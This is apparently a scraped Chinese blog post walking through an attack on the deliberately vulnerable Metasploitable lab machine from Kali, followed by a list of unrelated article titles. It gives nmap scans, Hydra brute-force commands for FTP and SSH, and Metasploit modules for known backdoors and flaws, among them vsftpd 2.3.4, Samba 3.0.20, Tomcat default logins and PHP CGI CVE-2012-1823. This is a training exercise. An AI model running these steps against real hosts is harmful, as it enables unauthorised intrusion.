kali渗透metasploitable靶机
来源:互联网 发布:淘宝电视机价格 编辑:程序博客网 时间:2024/06/05 07:26
扫描阶段:
工具:Nmap
隐蔽扫描 nmap -sS 192.168.8.135
端口爆破:FTP、SSH等
工具:Hydra
备用字典
- 爆破FTP
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://192.168.8.135
- 爆破SSH
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.8.135 ssh
登陆系统:
端口渗透:
- 6667——-irc_3281_backdoor
利用metasploit
成功获取会话,root权限
- 6200——-vsftpd_234_backdoor
利用metasploit
反弹会话,root权限
- 1524——-ingrelock_backdoor
利用telnet连接1524,直接返回root会话
- 1099——-distcc程序漏洞—-ingrelock
利用metasploit
返回会话
- 139——-samba为3.0漏洞
先用nmap进行详细扫描
nmap -v -A -T4 192.168.8.135
Samba 3.0.20
利用metasploit
返回会话,root权限
- 8180——-Apache Tomcat弱口令
使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破
用默认自带的字典即可
爆破出tomcat/tomcat
使用use exploit/multi/http/tomcat_mgr_upload模块
获取meterpreter会话
- 80——-PHP CGI参数注入执行漏洞
msf > search cve:2012-1823
msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options
msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135
rhost => 192.168.8.135
msf exploit(php_cgi_arg_injection) > run
- kali渗透metasploitable靶机
- kali渗透metasploitable靶机
- Kali渗透测试——利用metasploit攻击靶机WinXP SP1
- Exploiting Metasploitable with Metasploit in Kali Linux
- Metasploitable
- metasploitable
- Metasploitable
- 渗透测试学习系列之《Metasploitable介绍》(一)
- kali----渗透学习一
- Kali渗透基础
- kali-linux网络渗透
- kali 渗透测试
- 2015Kali渗透技术教程
- 2015Kali渗透技术教程
- 2015Kali渗透技术教程
- Kali渗透测试的步骤
- Kali渗透测试技术实战
- kali渗透思维导图
- api 公钥私钥的一点看法
- ViewPager的PagerAdapter的封装
- 现代企业该清楚的商业智能分析解决方案
- 指针和数组名及字符串的区别
- 面试机试之奖励问题
- kali渗透metasploitable靶机
- 使用matlab对训练样本图像降维,并对测试图像使用变换矩阵降维并重构
- MTK SmartPhone Record-(1)
- swift修改UITextfield的Placeholder字体大小和颜色
- Ucenter通信失败(终极解决)
- 一些很不错的Android开发技巧
- Trump 是一个通过数据库自动发现生成 RESTful 风格接口的框架。
- 使用Tensorflow训练自己的分割数据
- 如何设计一款多场景分布式发号器(Vesta)